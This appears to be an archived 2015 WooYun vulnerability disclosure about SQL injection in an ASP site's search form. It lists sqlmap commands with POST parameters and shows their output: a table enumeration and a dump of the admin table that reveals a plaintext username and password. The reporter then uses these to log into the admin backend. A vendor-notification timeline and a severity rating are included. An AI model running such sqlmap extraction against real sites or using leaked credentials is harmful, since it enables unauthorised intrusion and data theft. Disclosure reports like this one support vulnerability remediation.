乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-07: 细节已通知厂商并且等待厂商处理中 2015-10-08: 厂商已经确认,细节仅向厂商公开 2015-10-18: 细节向核心白帽子及相关领域专家公开 2015-10-28: 细节向普通白帽子公开 2015-11-07: 细节向实习白帽子公开 2015-11-22: 细节向公众公开
RT
http://**.**.**.**/index.asp
搜索框报错。
上工具
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/seach.asp" --data "keyword=1&imageField.x=25&imageField.y=8" --batch _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**web server operating system: Windowsweb application technology: ASP.NET, ASPback-end DBMS: Microsoft Access
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/seach.asp" --data "keyword=1&imageField.x=25&imageField.y=8" --tables --batch _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**Database: Microsoft_Access_masterdb[8 tables]+---------+| user || admin || adv || article || class || config || job || log |+---------+
D:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/seach.asp" --data "keyword=1&imageField.x=25&imageField.y=8" -T admin --dump --stop 1 --batch _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150919}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**Database: Microsoft_Access_masterdbTable: admin[1 entry]+----+------+---------+----+----+----+----+-------+--------+--------+--------+---------+---------+----------+----------+----------+| id | hide | classid | t2 | t1 | t3 | t4 | price | author | number | source | keyword | content | username | password | filename |+----+------+---------+----+----+----+----+-------+--------+--------+--------+---------+---------+----------+----------+----------+| 10 | 1 | 588 | NULL | NULL | NULL | NULL | NULL | s\\?8b | NULL | [f | NULL | <blank> | wjxit | wjxit | <blank> |+----+------+---------+----+----+----+----+-------+--------+--------+--------+---------+---------+----------+----------+----------+
账号:wjxit 密码:wjxit Domain扫到后台
进入后台
只是不知道为什么显示登陆ip是内网的。其他管理员(早知道有弱口令管理员,就不用这么麻烦了)
如上
好像很多东西都要修复。
危害等级:中
漏洞Rank:6
确认时间:2015-10-08 09:01
通知处理中
暂无